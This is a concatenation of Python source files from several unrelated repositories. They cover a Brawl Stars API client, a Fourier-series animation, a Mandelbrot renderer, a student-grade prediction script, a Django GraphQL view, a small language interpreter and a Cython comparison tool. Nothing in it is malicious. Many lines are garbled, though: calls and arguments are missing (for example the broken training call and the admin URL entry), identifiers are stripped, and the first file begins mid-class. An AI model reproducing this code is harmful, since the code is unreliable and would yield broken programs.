STAR) -> JSONS: return await self._fetchs("clublog", api, tag=tag) async def translations(self, code: str = "", api: str = STAR) -> JSONS: return await self._fetchs("translations", api, code=code) # TODO: api rearrange async def update_saves(self, now: bool = False, api: str = OFFIC) -> None: if now or time.time() - self._last_update >= self._min_update_time: self.collect() await self.brawlers(api=api) await self.powerplay(api=api) b, ps = await self.release() self._saves.update({"b": b, "ps": ps}) self._last_update = time.time() find_save = _find_save class SyncClient(SyncWith): def __init__( self, api_keys: Union[str, STRDICT], api_dict: Dict[str, API] = {}, # default_api: str = OFFIC, return_unit: bool = True, min_update_time: NUMBER = 60 * 10, data_handler: HANDLER = gets_handler, trust_env: bool = True, cache_ttl: NUMBER = 60, cache_limit: int = 1024, use_cache: bool = True, timeout: NUMBER = 30, repeat_failed: int = 3) -> None: self.session = SyncSession( trust_env=trust_env, cache_ttl=cache_ttl, cache_limit=cache_limit, use_cache=use_cache, timeout=timeout, repeat_failed=repeat_failed ) self.api_dict = {**default_api_dict, **api_dict} # self._current_api = self._default_api = default_api if isinstance(api_keys, str): self.api_dict[default_api].set_api_key(api_keys) else: for name, api_key in api_keys.items(): self.api_dict[name].set_api_key(api_key) self._return_unit = return_unit self._gets_handler = data_handler self._saves = {} self._min_update_time = min_update_time self.update_saves(True) def close(self) -> None: """Close session""" self.session.close() @property def closed(self) -> bool: """Is client session closed. A readonly property. """ return self.session.closed def _gets(self, *args: Any, **kwargs: Any) -> JSONSEQ: resps = self.session.gets(*args, **kwargs) return self._gets_handler(self, resps) def _get_api(self): if self._current_api is None: self._current_api = self._default_api return self.api_dict[self._current_api] def _fetch(self, path: str, from_json: bool = True, **kwargs: Any) -> JSONS: api = self._get_api() return self._gets( api.get(path, **kwargs), headers=api.headers, from_json=from_json) def _fetchs(self, paths: Union[STRS, AKW], from_json: BOOLS = True, rearrange: bool = True, **kwargs: Any) -> JSONS: api = self._get_api() if rearrange: pars = rearrange_params(paths, **kwargs) else: pars = paths urls = [api.get(*a, **kw) for a, kw in pars] return self._gets(urls, headers=api.headers, from_json=from_json) # @add_api_name(None) def test_fetch(self, *args, **kwargs): return self._fetchs(*args, **kwargs) # @add_api_name(OFFIC) def players(self, tag: str) -> JSONS: return self._fetchs("players", tag=tag) # @add_api_name(OFFIC) def battlelog(self, tag: str) -> JSONS: return self._fetchs("battlelog", tag=tag) # @add_api_name(OFFIC) def clubs(self, tag: str) -> JSONS: return self._fetchs("clubs", tag=tag) # @add_api_name(OFFIC) def members(self, tag: str, limit: INTSTR = 100) -> JSONS: return self._fetchs("members", tag=tag, limit=limit) # @add_api_name(OFFIC) def rankings(self, kind: str, key: Optional[INTSTR] = None, code: str = "global", limit: INTSTR = 200) -> JSONS: pars = rearrange_params( kind, key=key, code=code, limit=limit) return self._fetchs( [_rankings(self, *a, **kw) for a, kw in pars], rearrange=False) # @add_api_name(OFFIC) def brawlers(self, id: INTSTR = "", limit: INTSTR = "") -> JSONS: return self._fetchs("brawlers", id=id, limit=limit) # @add_api_name(OFFIC) def powerplay(self, code: str = "global", limit: int = 200) -> JSONS: return self._fetchs("rankings", code=code, limit=limit, kind=KINDS["ps"], id="") # @add_api_name(STAR) def events(self) -> JSONS: return self._fetchs("events") # @add_api_name(STAR) def icons(self) -> JSONS: return self._fetchs("icons") # @add_api_name(STAR) async def maps(self, id: INTSTR = "") -> JSONS: return self._fetchs("maps", id=id) # @add_api_name(STAR) def gamemodes(self) -> JSONS: return self._fetchs("gamemodes") # @add_api_name(STAR) def clublog(self, tag: str) -> JSONS: return self._fetchs("clublog", tag=tag) # @add_api_name(STAR) def translations(self, code: str = "") -> JSONS: return self._fetchs("translations", code=code) # @add_api_name(OFFIC) def update_saves(self, now: bool = False) -> None: if now or time.time() - self._last_update >= self._min_update_time: self._saves.update({ "b": self.brawlers(api=self._current_api), "ps": self.powerplay(api=self._current_api) }) self._last_update = time.time() find_save = _find_save ``` #### File: brawlpython/tests/ ```python import asyncio from brawlpython import AsyncClient from brawlpython.api_toolkit import unique, same from brawlpython.cache_utils import iscoro from configobj import ConfigObj import pytest url_uuid = "" config = ConfigObj("config.ini") api_key = config["DEFAULT"].get("API_KEY") @pytest.fixture def factory(loop): client = None async def maker(*args, **kwargs): nonlocal client client = await AsyncClient(*args, **kwargs) return client yield maker if client is not None: loop.run_until_complete(client.close()) @pytest.fixture def client(factory, loop): return loop.run_until_complete(factory(api_key)) async def test_async_init(): client = AsyncClient(api_key) assert iscoro(client) assert isinstance(await client, AsyncClient) async def test_closing(client): assert not client.closed for _ in 1, 2: await client.close() assert client.closed async def no_test_cache(client): responses = [await client._get(url_uuid) for _ in range(2)] assert same(responses) await asyncio.sleep(2) assert await client._get(url_uuid) != responses[0] async def no_test_no_cache(factory): client = await factory(api_key, use_cache=False) assert unique([await client._get(url_uuid) for _ in range(2)]) assert unique(await client._gets([url_uuid] * 2)) # FIXME: complete test async def test_data_handler(factory): client = await factory(api_key, data_handler=lambda *x: None) await client._get(url_uuid) if __name__ == "__main__": import run_tests ``` #### File: brawlpython/tests/ ```python import pytest import asyncio from brawlpython.sessions import AsyncSession from brawlpython.api_toolkit import unique, same from brawlpython.cache_utils import iscoro from configobj import ConfigObj url_uuid = "" # @pytest.yield_fixture # def api_key(): config = ConfigObj("config.ini") api_key = config["DEFAULT"].get("API_KEY") @pytest.fixture def factory(loop): client = None async def maker(*args, **kwargs): nonlocal client client = await AsyncSession(*args, **kwargs) return client yield maker if client is not None: loop.run_until_complete(client.close()) @pytest.fixture def client(factory, loop): return loop.run_until_complete(factory(api_key, cache_ttl=1)) async def test_async_init(): client = AsyncSession(api_key) assert iscoro(client) assert isinstance(await client, AsyncSession) async def test_closing(client): assert not client.closed for _ in 1, 2: await client.close() assert client.closed async def test_cache(client): responses = [await client.get(url_uuid) for _ in range(2)] assert same(responses) await asyncio.sleep(2) assert await client.get(url_uuid) != responses[0] async def test_no_cache(factory): client = await factory(api_key, use_cache=False) assert unique([await client.get(url_uuid) for _ in range(2)]) assert unique(await client.gets([url_uuid] * 2)) if __name__ == "__main__": import run_tests ```
{ "source": "0dminnimda/fourier-series", "score": 3 }
#### File: fourier-series/complex_fourier_series/ ```python from typing import List, Tuple, Union import pygame as pg from pygame.locals import K_ESCAPE, KEYDOWN, QUIT from pygame.math import Vector2 from .series import Series from .svg_handling import FLOAT_TO_COMPLEX, create_path_function_from_file __all__ = ( "BLACK", "VECTOR_COLOR", "VECTOR_WIDTH", "PATH_COLOR", "PATH_WIDTH", "main_loop", "draw", "draw_arrow", "draw_path", "complex_to_tuple") BLACK = (0, 0, 0) VECTOR_COLOR = (255, 0, 0) VECTOR_WIDTH = 1 PATH_COLOR = (0, 255, 0) PATH_WIDTH = 1 def main_loop(size: Tuple[int, int], path_func: FLOAT_TO_COMPLEX, quantity: int, time_divider: Union[int, float], ): display = pg.display.set_mode(size) series: Series = Series() series.create_formulas(quantity, path_func) time: int = 0 path: List[Vector2] = [] offset: complex = complex(*size) / 2 while 1: for event in pg.event.get(): if event.type == QUIT: return None if event.type == KEYDOWN: if event.key == K_ESCAPE: return None display.fill(BLACK) draw(display, series, offset, time/time_divider, path) time += 1 pg.display.flip() if time == int(2 * time_divider): time = 0 del path[:int(time_divider)] def draw(display: pg.Surface, series: Series, offset: complex, time: float, path: List[complex]) -> None: values: List[complex] = series.evaluate_all(time) current_value: complex = 0j for value in values: new_value: complex = current_value + value draw_arrow(display, current_value + offset, new_value + offset) current_value = new_value path.append(Vector2( complex_to_tuple(current_value + offset))) draw_path(display, path) def draw_arrow(display: pg.Surface, from_val: complex, to_val: complex) -> None: pg.draw.line(display, VECTOR_COLOR, complex_to_tuple(from_val), complex_to_tuple(to_val), VECTOR_WIDTH) def draw_path(display: pg.Surface, path: List[Vector2]) -> None: if len(path) < 2: return pg.draw.aalines(display, PATH_COLOR, False, path) # PATH_WIDTH, def complex_to_tuple(value: complex) -> Tuple[float, float]: return ((value.real), (value.imag)) ``` #### File: fourier-series/complex_fourier_series/ ```python from cmath import exp, tau from typing import List import numpy as np from quadpy import quad from .svg_handling import FLOAT_TO_COMPLEX TAU_I: complex = tau * 1j def create_nth_constant_function( n: int, path_func: FLOAT_TO_COMPLEX) -> FLOAT_TO_COMPLEX: def f(t: float) -> complex: return path_func(t) * exp(-n * TAU_I * t) return f def calculate_nth_constant( n: int, constant_func: FLOAT_TO_COMPLEX) -> complex: def array_f(array: np.array): return np.array(list(map(constant_func, array))) return quad(array_f, 0., 1., limit=30000)[0] def create_nth_series_function( n: int, nth_constant: complex) -> FLOAT_TO_COMPLEX: def f(t: float) -> complex: return nth_constant * exp(n * TAU_I * t) return f def get_frequency_by_index(index: int) -> int: """ -> 0 1 2 3 4 5 6 7 8 ... <- 0 1 -1 2 -2 3 -3 4 -4 ... """ sign: int = -1 if index % 2 == 0 else 1 return ((index + 1) // 2) * sign class Series: __slots__ = "_formulas", def __init__(self) -> None: self._formulas: List[FLOAT_TO_COMPLEX] = [] def create_formulas( self, quantity: int, path_func: FLOAT_TO_COMPLEX) -> None: self._formulas.clear() for i in range(quantity): n = get_frequency_by_index(i) constant_func: FLOAT_TO_COMPLEX = ( create_nth_constant_function( n, path_func)) constant: complex = ( calculate_nth_constant( n, constant_func)) self._formulas.append( create_nth_series_function( n, constant)) def evaluate_all(self, time: float) -> List[complex]: return [ formula(time) for formula in self._formulas ] ```
{ "source": "0dminnimda/mondebrot_painter", "score": 3 }
#### File: mondebrot_painter/2019/ ```python import cv2 as cv import time import numpy as np import multiprocessing as mp from multiprocessing import Process def st(z): r = z[0]**2-(z[1]**2) i = z[0]*z[1]*2 return r, i def f(z, c): s = st(z) r = s[0]+c[0] i = s[1]+c[1] return r, i def mon(r, i, n=100): z = (0, 0) c = (r, i) try: for i in range(n): z = f(z, c) except OverflowError: p = False else: p = True return p def drmon(qlt, devi1, dell, part, qq=0): part -= 1 # qlt*=2 sqq = sqrt(qlt) de = 100*qlt h1 = de*-1.25 v1 = de*-2.1 # qlt*185 hr, vr = (250/devi1)*qlt+1, (265/dell)*qlt v1 += vr*part #print(-h1+(h1+hr), -v1+(v1+vr), qlt, devi1, dell, part) h1, v1, de, hr, vr = int(h1), int(v1), int(de), int(hr), int(vr) #print(-h1+(h1+hr), -v1+(v1+vr), qlt, devi1, dell, part) ww = [[[None, i/de, j/de] for j in range(h1, h1+hr)] for i in range(v1, v1+vr)] for i in ww: for j in i: j[0] = mon(j[1], j[2]) if qq != 0: qq.put(ww) else: return ww def funccol(qlt, mode, dell): ran = range(1, dell+1) qq, pr, w, wg = {}, {}, {}, [] for i in ran: qq[i] = mp.Queue() pr[i] = Process(target=drmon, args=([qlt, mode, dell, i, qq[i]])) pr[i].start() for i in ran: w[i] = qq[i].get() wg += w[i] pr[i].join() return wg def myar_to_img(w, fcolor, scolor, mode): hei = len(w)*1 wid = len(w[0])*1 ar1 = np.zeros((hei, wid, 3), np.uint8) ar1[:] = fcolor ar = np.zeros((hei*2, wid*2, 3), np.uint8) ii = -1 for i in w: ii += 1 jj = -1 for j in i: jj += 1 if j[0] is True: ar1[ii][jj] = scolor ar2 = np.copy(ar1) for i in range(len(ar2)): ar2[i][::] = ar2[i][::-1] ar1 = ar1[0:len(ar1), 0:len(ar1[0])-1] ar = np.concatenate((ar1, ar2), axis=1) if mode == 1: return ar2 elif mode == 2: return ar else: return "error" if __name__ == '__main__': #for i in range(1,11): # drmon(2**i,2,1,1) factor = 0 while 1: factor += 1 # quality factor start_0 = time.time() qual = 2**factor # quality processes_num = 8 # number of processes used in multiprocessing mode = 2 # when “1” calculates the whole image, # when “2” calculates the mirror half; only affects performance # h1,v1 = 50,50 myar = funccol(qual, mode, processes_num) # multiprocessing img = myar_to_img(myar, (255, 255, 255), (0, 0, 0), mode) end_0 = time.time() - start_0 print(end_0, "sec") # cv.namedWindow ( "b" , cv.WINDOW_NORMAL) cv.imshow(f"mon_img_{qual}", img) cv.imwrite(f"mon_img_{qual}.png", img) cv.waitKey(0) cv.destroyAllWindows() ``` #### File: mondebrot_painter/2020/ ```python import os import pickle def dump(name, value, end=".pickle"): full_name = check_name(name, end) create(name) with open(full_name, "wb") as file: pickle.dump(value, file) return value def create(name, end=".pickle", only=None): full_name = check_name(name, end) # existing test try: open(full_name, "xb").close() except Exception: pass # filling test if not file_size(name) > 0: with open(full_name, "wb") as file: # create main array if only is None: pickle.dump([], file) def load(name, end=".pickle"): full_name = check_name(name, end) with open(full_name, 'rb') as file: return pickle.load(file) def check_len(name, end=".pickle"): return len(load(name, end)) def file_size(name, end=".pickle"): full_name = check_name(name, end) return os.path.getsize(full_name) def check_name(name, end): if name.starswith(end): return name else: return name + end ```
{ "source": "0dminnimda/NTO_bigdata_2020_final", "score": 3 }
#### File: 0dminnimda/NTO_bigdata_2020_final/ ```python import pandas as pd # import lightgbm data = pd.read_csv("X_train.csv", index_col=0) data["mark"] = pd.read_csv("y_train.csv", index_col=0)["mark"] stud_info = pd.read_csv("studs_info.csv", index_col=False) X_validation = pd.read_csv("X_test.csv", index_col=0) # rename columns field_map = { "STD_ID": "stud", "НАПРАВЛЕНИЕ": "profession", "ГОД": "year", "АТТЕСТАЦИЯ": "exam_type", "ДИСЦИПЛИНА": "discipline", "КУРС": "course", "СЕМЕСТР": "semester", " number": "number", "Пол": "sex", "Статус": "state", "Дата выпуска": "release_date", "Категория обучения": "category", "Форма обучения": "study_kind", "Шифр": "cipher", "направление (специальность)": "speciality", " ": "what?", "Образование": "lvl_of_education", "Дата выдачи": "issue_date", "Что именно закончил": "education", } data.rename(columns=field_map, inplace=True) X_validation.rename(columns=field_map, inplace=True) stud_info.rename(columns=field_map, inplace=True) stud_info.drop(stud_info[stud_info["stud"] == 92222].index, inplace=True) # stud_info[np.isin(stud_info["number"], range(850, 900))].sort_values(by=["stud"]) # all(stud_info.groupby("speciality")["cipher"].nunique().eq(1))# and all(stud_info.groupby("cipher")["speciality"].nunique().eq(1)) g = stud_info.groupby("speciality")["cipher"].nunique() print(g[g != 1]) set(stud_info[stud_info["speciality"] == "Журналистика"]["cipher"]) # 203283 # remove duplicate entries (older ones) stud_info = stud_info.sort_values(by=["stud", "issue_date"], na_position="first") stud_info.drop_duplicates(subset=["stud"], keep="last", inplace=True) import numpy as np assert len(stud_info[np.isin(stud_info["stud"], stud_info[stud_info.duplicated(subset=["stud"])])]) == 0 # clean up # for each stud: year == course + const # for each stud: course == ceil(semester / 2) # therefore they are noise fields = ["year", "course"] data.drop(fields, axis=1, inplace=True) X_validation.drop(fields, axis=1, inplace=True) # all nulls and not present in data / validation stud_info.drop(stud_info[stud_info["stud"] == 92222].index, inplace=True) # for each stud: all number_s are equal assert all(stud_info.groupby("number")["stud"].nunique().le(1)) and all(stud_info.groupby("stud")["number"].nunique().le(1)) fields = ["number", "issue_date", "release_date"] stud_info.drop(fields, axis=1, inplace=True) { # ('НС', 'СР'): 4, # ('ОСН', 'СР'): 3, # ('НС', 'СП'): 5, # ('СР', 'СП'): 111, # ('ОСН', 'СП'): 24, # ('ОО', 'СР'): 22, # ('ОО', 'СП'): 131, ('НП', 'СР'): 1, ('НП', 'СП'): 10, ('СП', 'СП'): 7, ('СР', 'СР', 'СП'): 1, ('СР', 'СР'): 1, ('СП', 'СР'): 1, ('СП', 'НП'): 1} # ('ОО', 'СР' ) # ( 'СР', 'СП') # ('ОО', 'СП') # ('ОО', 'СР', 'СП') # ( 'ОСН', 'СР' ) # ( 'ОСН', 'СП' ) ('ОО', 'ОСН', 'СР', 'СП') ('НС', 'СР' ) ('НС', 'СП') # # SeriesGroupBy.cummax() stud_info stud_info.fillna({"lvl_of_education": "НЕТ", "what?": 0.0}, inplace=True) data = data.merge(stud_info, how="left", on="stud") X_validation = X_validation.merge(stud_info, how="left", on="stud") data # encode labels from sklearn import preprocessing fields = ["discipline", "profession", "exam_type", "sex", "category", "speciality", "education", "state", "cipher"] le_s = { field_name: preprocessing.LabelEncoder().fit(pd.concat([data[field_name], X_validation[field_name]])) for field_name in fields} order = [ "НЕТ", # 190 Нет данных "ОО", # 160 Начальное общее образование "ОСН", # 32 Основное общее образование "НС", # 14 Неполное среднее образование "СР", # 4101 Среднее общее образование "НВ", # 2 Неполное высшее образование "НП", # 50 Начальное/Незаконченное? профессиональное образование "СП", # 916 Среднее профессиональное образование ] le_s["lvl_of_education"] = preprocessing.LabelEncoder().fit(order) order = ["В", "Д", "З"] # вечернее, дневное, заочное le_s["study_kind"] = preprocessing.LabelEncoder().fit(order) for field_name, le in le_s.items(): data[field_name] = le.transform(data[field_name]) X_validation[field_name] = le.transform(X_validation[field_name]) # 69.0 to 69 fields = ["semester", "what?"] for field_name in fields: data[field_name] = data[field_name].astype(int) X_validation[field_name] = X_validation[field_name].astype(int) # normalize data["semester"] -= 1 X_validation["semester"] -= 1 data # means fields = ["stud", "profession", "discipline", "speciality", "education", "cipher"] for field_name in fields: mean_mark = data.groupby(field_name).mean()["mark"] mean_name = field_name + "_mean" data[mean_name] = data[field_name].map(mean_mark) X_validation[mean_name] = X_validation[field_name].map(mean_mark) # create dummy variables columns = []#"exam_type"]#, "discipline", "profession"] data = pd.get_dummies(data, columns=columns) X_validation = pd.get_dummies(X_validation, columns=columns) # remove unneeded data # use previous fields # fields = ["stud", "discipline", "profession"] data.drop(fields, axis=1, inplace=True) X_validation.drop(fields, axis=1, inplace=True) data from sklearn.model_selection import train_test_split from sklearn.model_selection import GridSearchCV marks = data.pop("mark") X_train, X_test, y_train, y_test = train_test_split(data, marks, shuffle=True, test_size=0.2) import autosklearn.classification import autosklearn.metrics from get_config import config import time automl = autosklearn.classification.AutoSklearnClassifier(metric=autosklearn.metrics.mean_absolute_error, logging_config=config) print("start", time.time()), y_train) print(time.time()) def p(): print(automl.cv_results_) print(automl) print({name: getattr(automl, name) for name in dir(automl)}) p() # parameters = { # # LGBMRegressor(min_child_samples=1, min_child_weight=1.0, n_estimators=1000, # # num_leaves=50, random_state=42, reg_alpha=1.0, reg_lambda=1.0)) # 'boosting_type': ('gbdt', 'dart', 'goss', 'rf',), # 'num_leaves': [2, 15, 31], # "n_estimators": np.linspace(1, 1000, 4, dtype=int), # # "min_split_gain": np.linspace(0, 1, 4), # # "min_child_weight": [1e-3, 1.], # # "min_child_samples": [1, 30], # "reg_alpha": np.linspace(0, 1, 4), # "reg_lambda": np.linspace(0, 1, 4), # } # parameters = { # 'boosting_type': ('gbdt', 'dart', 'goss', 'rf',), # 'num_leaves': [1, 50], # "n_estimators": [1, 1000], # "min_split_gain": [0., 1.], # "min_child_weight": [1e-3, 1.], # "min_child_samples": [1, 30], # "reg_alpha": [0., 1.], # "reg_lambda": [0., 1.], # } # clf = GridSearchCV(lightgbm.LGBMRegressor(random_state=42), parameters, verbose=3, cv=2, scoring='neg_mean_absolute_error') # n_jobs=10, #, y_train) # print(clf.cv_results_) # print(clf.best_estimator_) from sklearn.metrics import mean_absolute_error, r2_score pred_mark = automl.predict(X_test) print(mean_absolute_error(y_test, pred_mark)) print(r2_score(y_test, pred_mark)) print("gg", time.time()), marks) print(time.time()) p() y_pred = pd.read_csv("sample_submission.csv", index_col=0) y_pred["mark"] = automl.predict(X_validation) y_pred.to_csv("baseline_submission.csv") #ya tyt bil #I was here ```
{ "source": "0dminnimda/NTO_fintech_2022_final", "score": 2 }
#### File: backend/sugomA/ ```python import json from typing import cast from ariadne.constants import DATA_TYPE_JSON, DATA_TYPE_MULTIPART from ariadne.exceptions import HttpBadRequestError from ariadne.file_uploads import combine_multipart_data from ariadne.graphql import graphql_sync from django.conf import settings from django.contrib import admin from django.http import HttpRequest, HttpResponseBadRequest, JsonResponse from django.shortcuts import render from django.urls import path from django.views.decorators.csrf import csrf_exempt from graphql import GraphQLSchema from .exceptions import error_formatter from .AmogusApp.views import check, home from .schema import code_smell, schema def extract_data_from_request(request: HttpRequest): content_type = request.content_type or "" content_type = content_type.split(";")[0] if content_type == DATA_TYPE_JSON: try: return json.loads(request.body) except (TypeError, ValueError) as ex: raise HttpBadRequestError( "Request body is not a valid JSON") from ex if content_type == DATA_TYPE_MULTIPART: try: operations = json.loads(request.POST.get("operations", "{}")) except (TypeError, ValueError) as ex: raise HttpBadRequestError( "Request 'operations' multipart field is not a valid JSON") from ex try: files_map = json.loads(request.POST.get("map", "{}")) except (TypeError, ValueError) as ex: raise HttpBadRequestError( "Request 'map' multipart field is not a valid JSON") from ex return combine_multipart_data(operations, files_map, request.FILES) raise HttpBadRequestError( "Posted content must be of type {} or {}".format( DATA_TYPE_JSON, DATA_TYPE_MULTIPART)) def get_context_for_request(context_value, request: HttpRequest): if callable(context_value): return context_value(request) return context_value or {"request": request} def get_extensions_for_request(extensions, request: HttpRequest, context): if callable(extensions): return extensions(request, context) return extensions def get_kwargs_graphql(request: HttpRequest) -> dict: context_value = get_context_for_request(None, request) extensions = get_extensions_for_request(None, request, context_value) # http_method_names = ["get", "post", "options"] # template_name = "ariadne_django/graphql_playground.html" # playground_options: Optional[dict] = None # schema: Optional[GraphQLSchema] = None return { "context_value": context_value, "root_value": None, "validation_rules": None, "debug": settings.DEBUG, "introspection": True, "logger": None, "error_formatter": error_formatter, "extensions": extensions, "middleware": None, } @csrf_exempt def graphql_view(request: HttpRequest): if request.method == "GET": return render(request, "home.html") try: data = extract_data_from_request(request) except HttpBadRequestError as error: return HttpResponseBadRequest(error.message) print("\n" + "#"*5, "request", data) = request.COOKIES success, result = graphql_sync( cast(GraphQLSchema, schema), data, **get_kwargs_graphql(request)) status_code = 200 if success else 400 if code_smell["requested_auth"] > 0: code_smell["requested_auth"] -= 1 response = JsonResponse(result, status=status_code) print("#"*5, "response", result) for n, v in response.set_cookie(n, v) return response @csrf_exempt def rooms_view(request: HttpRequest): return render(request, "rooms.html") @csrf_exempt def rooms_create_view(request: HttpRequest): return render(request, "rooms_create.html") @csrf_exempt def room_view(request: HttpRequest, room_id): print('ROOM:', room_id) return render(request, "room.html") urlpatterns = [ path("", csrf_exempt(home)), path("admin/",, path('graphql', graphql_view, name='graphql'), path('rooms', rooms_view), path('rooms/create', rooms_create_view), path('room/<int:room_id>', room_view), path("check", csrf_exempt(check)), ] ```
{ "source": "0dminnimda/PyBEX", "score": 3 }
#### File: PyBEX/pybex/ ```python from dataclasses import dataclass, field from functools import partial from typing import Callable, Dict, List, Optional, Type, TypeVar, Union # Interpretation @dataclass class Scope: namespace: Dict[str, "Expr"] = field( default_factory=dict) def update_by_scope(self, scope: "Scope") -> None: self.namespace.update(scope.namespace) @classmethod def from_funcions(cls, *funcions: "Function"): return cls({ func for func in funcions }) class EvalContext: scopes: List[Scope] last_funcall: Optional["Funcall"] def __init__(self, scope: Optional[Scope] = None): if scope is None: scope = Scope() self.scopes = [scope] self.last_funcall = None @property def scope(self) -> Scope: return self.scopes[-1] def add_scope(self, scope: Scope) -> None: self.scopes.append(scope) def add_new_scope(self) -> None: self.add_scope(Scope()) def pop_scope(self) -> None: if len(self.scopes) == 0: raise RuntimeError("Cannot removethe only one last scope, " "there always should be at least one left") del self.scopes[-1] # AST class Expr: pass @dataclass class Program: body: List[Expr] @dataclass class Number(Expr): value: Union[int, float] def __repr__(self): return repr(self.value) def __str__(self): return str(self.value) @dataclass class String(Expr): value: str def __repr__(self): return repr(self.value) def __str__(self): return self.value @dataclass class Word(Expr): value: str @dataclass class Funcall(Expr): name: str args: List[Expr] PyFunctionT = Callable[[EvalContext, List[Expr]], Expr] FuncT = TypeVar("FuncT", bound="Function") @dataclass class Function(Expr): name: str _func: PyFunctionT @classmethod def named_py(cls: Type[FuncT], name: str) -> Callable[[PyFunctionT], FuncT]: return partial(cls, name) @classmethod def py(cls: Type[FuncT], func: PyFunctionT) -> FuncT: return cls(func.__name__[4:], func) # too dynamic for type checkers: # @classmethod # def py( # cls: Type[FuncT], arg1: Union[PyFunctionT, str] # ) -> Union[FuncT, Callable[[PyFunctionT], FuncT]]: # if isinstance(arg1, str): # return partial(cls, arg1) # return cls(arg1.__name__, arg1) def __call__(self, ctx: EvalContext, exprs: List[Expr]) -> Expr: return self._func(ctx, exprs) def __repr__(self): return f"Function(name={!r})" # AST/code Constants class NothingType(Expr): def __repr__(self): return "Nothing" Nothing = NothingType() class UnfinishedType(Expr): pass Unfinished = UnfinishedType() ``` #### File: PyBEX/pybex/ ```python import ast from dataclasses import dataclass from lark import Lark, Transformer from .classes import Funcall, Number, Program, String, Unfinished, Word @dataclass class BEXTransformer(Transformer): interactive: bool def int(self, items): return Number(int(items[0].value)) def float(self, items): return Number(float(items[0].value)) def string(self, items): return String(ast.literal_eval(items[0].value)) def unfinished_string(self, items): if self.interactive: return Unfinished # TODO: pretty parsing errors raise SyntaxError("unterminated triple-quoted string literal") def word(self, items): return Word(items[0].value) def funcall(self, items): return Funcall(items[0].value, items[1:]) def unfinished_call(self, items): if self.interactive: return Unfinished # TODO: pretty parsing errors raise SyntaxError("unexpected EOF while parsing") def exec_input(self, items): return Program(items) def single_input(self, items): return Program(items) _transformer = BEXTransformer(False) _parser = "grammar.lark", parser="lalr", transformer=_transformer, start=["single_input", "exec_input"], rel_to=__file__, # priority="invert" # debug=True, # propagate_positions=True, ) # with open(os.path.join(os.path.dirname(__file__), )) as f: # PARSER = Lark(f) # del f def parse_source(source: str, mode: str = "exec") -> Program: if mode == "exec": _transformer.interactive = False start = "exec_input" # method = _parser.parse # elif mode == "eval": # _transformer.interactive = False # start = "expr" elif mode == "single": _transformer.interactive = True start = "single_input" # method = _parser.parse_interactive else: raise ValueError("`mode` must be 'exec'" # ", 'eval'" " or 'single'") return _parser.parse(source, start=start) # type: ignore # def parse_file(path: str, mode: str = "exec") -> Program: # with open(path) as f: # return parse_source(, mode) ```
{ "source": "0dminnimda/translation_comparator", "score": 2 }
#### File: examples/cython/ ```python import cython def test(): p:[1000] = [0] * 1000 p[0] = 100 ``` #### File: translation_comparator/cython/ ```python import re from pathlib import Path from typing import List, Tuple from bs4 import BeautifulSoup, FeatureNotFound from bs4.element import Tag def get_code_from_soup(soup: BeautifulSoup) -> List[str]: return [ tag.text for tag in soup.find_all("pre", class_="code")] def get_soup_from_html(path: Path) -> BeautifulSoup: html = path.with_suffix(".html").read_text() html = html.replace(path.stem, "{fname}") html = html.replace(path.stem[:-1], "{fname}") html = re.sub(r"\d+{fname}", "{num_fname}", html) html = html.replace("{fname}" + "_" + path.suffix[1:], "{fname_suf}") try: return BeautifulSoup(html, "lxml") except FeatureNotFound: try: return BeautifulSoup(html, "html5lib") except FeatureNotFound: return BeautifulSoup(html, "html.parser") def get_code_from_two_files_by_path( path1: Path, path2: Path ) -> Tuple[List[str], List[str]]: return ( get_code_from_soup(get_soup_from_html(path1)), get_code_from_soup(get_soup_from_html(path2))) def get_code_from_two_files( file1: str, file2: str ) -> Tuple[List[str], List[str]]: return get_code_from_two_files_by_path( Path(file1), Path(file2)) ``` #### File: translation_comparator/cython/ ```python from pathlib import Path from typing import Iterable from Cython.Build import cythonize from ..comparison_helpers import compare_cythonized from ..pair_finders import pairs_and_extentions_for_cython from . import settings def cythonize_paths(paths: Iterable[Path], **kwargs) -> None: if "module_list" in kwargs: raise ValueError("module_list should not be present") kwargs.update(build_dir=str(settings.build_dir), annotate=True) cythonize(list(map(str, paths)), **kwargs) def cythonize_and_compare(*patterns: str, **kwargs): pairs, py_paths, pyx_paths = pairs_and_extentions_for_cython(*patterns) build_dir = settings.build_dir settings.build_dir = build_dir.joinpath(settings.py_dir) # dirty singleton cythonize_paths(py_paths, **kwargs) settings.build_dir = build_dir.joinpath(settings.pyx_dir) cythonize_paths(pyx_paths, **kwargs) settings.build_dir = build_dir compare_cythonized(pairs) ``` #### File: translation_comparator/translation_comparator/ ```python from distutils.extension import Extension from pathlib import Path from typing import Collection, Iterable, Iterator, List, Optional, Set, Tuple from .cython import settings as cython_settings from .path_helpers import full_path, relative_to_cwd, self_glob, with_parent from .typedefs import GEN_PATH_FUNC def includes_excludes_from_patterns( *patterns: str ) -> Tuple[List[Path], List[Path]]: includes, excludes = [], [] for pattern in patterns: if pattern[:2] == "\\!": excludes.append(full_path( Path(pattern[2:]))) else: includes.append(full_path( Path(pattern))) return includes, excludes def no_matches(path: Path, patterns: Collection[Path]) -> bool: for pattern in patterns: if path.match(str(pattern)): return False return True def matching_paths( includes: Iterable[Path], excludes: Collection[Path], ) -> Iterator[Path]: for path in includes: for match in self_glob(path): if no_matches(match, excludes): yield match def paths_for_cython(*patterns: str) -> Iterator[Path]: # if returned is None: returned: Set[str] = set() includes, excludes = includes_excludes_from_patterns(*patterns) extensions = cython_settings.extensions for path in matching_paths(includes, excludes): if path.suffix in extensions and not in returned: yield path returned.add( def pairs_and_extentions_for_cython( *patterns: str ) -> Tuple[List[Tuple[Path, Path]], List[Path], List[Path]]: pairs: List[Tuple[Path, Path]] = [] py_paths: List[Path] = [] pyx_paths: List[Path] = [] path_func = cython_settings.path_func build_dir = cython_settings.build_dir for path in paths_for_cython(*patterns): path1, path2 = path_func(path) path1 = relative_to_cwd(path1) path2 = relative_to_cwd(path2) new_path1 = with_parent(path1, cython_settings.py_dir) new_path2 = with_parent(path2, cython_settings.pyx_dir) py_paths.append(path1) pyx_paths.append(path2) pairs.append(( cython_settings.build_dir.joinpath(new_path1), cython_settings.build_dir.joinpath(new_path2))) return pairs, py_paths, pyx_paths ``` #### File: translation_comparator/translation_comparator/ ```python from glob import iglob from pathlib import Path from typing import Iterator, Tuple from .cython import settings as cython_settings def self_glob(path: Path) -> Iterator[Path]: for string in iglob(str(path)): yield Path(string) def full_path(path: Path) -> Path: return path.expanduser().absolute() def relative_to_cwd(path: Path) -> Path: return path.relative_to(Path.cwd()) def with_parent(path: Path, directory: Path) -> Path: return directory.joinpath( def change_same_paths_if_needed(path1: Path, path2: Path) -> 